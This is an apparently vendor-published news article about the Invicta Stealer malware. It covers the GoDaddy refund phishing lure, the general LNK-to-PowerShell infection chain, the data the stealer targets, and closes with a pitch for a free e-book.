The Invicta malware has been causing havoc in the cybersecurity industry due to its ability to steal sensitive information from unsuspecting users. The malware operates by collecting system data, hardware information, wallet data, browser data, and information from applications like Steam and Discord.
According to reports from Cyble Research and Intelligence Labs (CRIL), the creator of Invicta malware is highly active on social networking sites, using them to advertise the deadly powers of the malware. The hacker has even created a free open-source version of Invicta malware, which is available on GitHub.
Researchers at CRIL have discovered a significant increase in the prevalence of Invicta Stealer due to its builder availability on the GitHub page. Cyber-criminals are actively employing it to infect unsuspecting users. The malware operates by using phishing emails, which are a deceptive way to fool users into downloading the malware.
Using phishing emails is a common tool hackers use to deceive customers into downloading malware. One of the most targeted is the GoDaddy refund email. GoDaddy refund emails have become a common tool hackers use to deceive customers into downloading malware.
The infection starts with a spam email that contains a misleading HTML page intended to fool the recipients into thinking it is an actual refund invoice from GoDaddy. Users that view the phishing HTML page are immediately taken to a Discord URL, where they can download the “Invoice.zip” file.
Inside the “Invoice.zip” archive file, there is a shortcut file named “INVOICE_MT103.lnk”. When the user opens this .LNK file, it triggers a PowerShell command that runs an .HTA file hosted on the TAs Discord server. This HTA file has VBScript code in it, and that VBScript code then runs a PowerShell script. The PowerShell script downloads the Invicta Stealer.
After the malware is downloaded, it gathers sensitive information from the infected devices. The list of targeted web browsers includes Google Chrome, Mozilla Firefox, and Microsoft Edge. The malware also targets cryptocurrency wallets, including Bitcoin, Litecoin, Ethereum, and Ripple.
The Invicta Stealer can steal crucial information such as active gaming sessions, usernames, and a comprehensive list of games installed by the user on the system. It can also target the less popular but still expected KeyPass password manager application.
Due to its capacity to target numerous types of extremely sensitive information across different applications and browsers, the Invicta Stealer is a particularly formidable danger. Attackers can use this stolen information to initiate assaults on other people or companies as well as use it to increase their financial benefit.
It is essential to recognize the seriousness of this threat and take the necessary precautions to safeguard against such nefarious acts. Shut down phishing attacks with device posture security. Download the free e-book to learn more about how to protect your devices from Invicta malware and other phishing attacks.